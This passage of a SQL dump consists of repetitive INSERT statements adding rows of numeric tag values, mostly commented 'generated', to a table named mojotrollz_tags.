30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12477, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12477, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12478, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12478, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12479, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12479, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12480, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12481, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12481, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12496, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12496, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12497, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12497, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12498, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12498, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12557, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12557, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12557, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12576, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12576, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12577, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12577, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12578, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12578, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12579, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12579, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12580, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12581, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12596, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12596, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12616, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12616, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12617, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12617, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12636, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12636, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12656, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12657, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12658, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12676, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12677, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12677, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12678, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12696, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12716, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12716, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12717, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12718, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12719, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12720, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12721, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12722, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12722, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12723, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12723, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12724, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12724, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12736, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12737, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12737, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12738, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12739, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12740, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12740, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12756, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12757, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12757, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12758, 1, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12758, 1, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12758, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12759, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12759, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12776, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12776, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12777, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12778, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12779, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12780, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12781, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12783, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12784, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12785, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12786, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12787, 1, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12788, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12788, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12788, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12788, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12788, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12788, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12789, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12789, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12789, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12789, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12789, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12790, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12790, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12790, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12790, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12790, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12790, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12791, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12791, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12791, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12791, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12791, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12792, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12793, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12793, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12793, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12793, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12793, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12793, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12794, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12794, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12794, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12794, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12794, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12794, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12795, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12795, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12795, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12795, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12795, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12796, 1, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12796, 1, 2, 2917, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12796, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12796, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12796, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12797, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12798, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12799, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12799, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12799, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12799, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12799, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12800, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12800, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12801, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12801, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12802, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12802, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12803, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12803, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12805, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12805, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12807, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12807, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12816, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12818, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12818, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12819, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12836, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12836, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12837, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12856, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12858, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12858, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12859, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12859, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12860, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12861, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12862, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12862, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12863, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12863, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12864, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12864, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12865, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12865, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12866, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12866, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12867, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12867, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12876, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12877, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12896, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12896, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12897, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12897, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12898, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12899, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12899, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12900, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12902, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12902, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12902, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12903, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12903, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12904, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12919, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12919, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12920, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12920, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12924, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12925, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12937, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12938, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12939, 1, 1, 1, 'generated'); 